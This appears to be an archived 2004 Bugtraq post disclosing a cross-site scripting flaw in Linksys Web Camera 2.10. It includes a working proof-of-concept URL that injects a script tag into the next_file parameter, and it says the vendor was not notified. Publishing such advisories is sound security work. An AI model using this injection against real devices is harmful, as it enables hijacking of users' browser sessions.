[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Linksys Web Camera Cross-site Scripting Vuln
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Linksys Web Camera Cross-site Scripting Vuln
- From: Tyler Guenter aka scriptX <scriptX_@xxxxxxxxxxx>
- Date: 13 Jun 2004 14:06:58 -0000
Linksys Web Camera version 2.10 (only tested with 2.10) is vulnerable to a
cross-site scripting vulnerability.
Example:
http://www.host.com/main.cgi?next_file=poop<script>alert('scriptX
:P');</script>
Linksys was not notified (I didnt notify them about the file inclusion vuln
either..)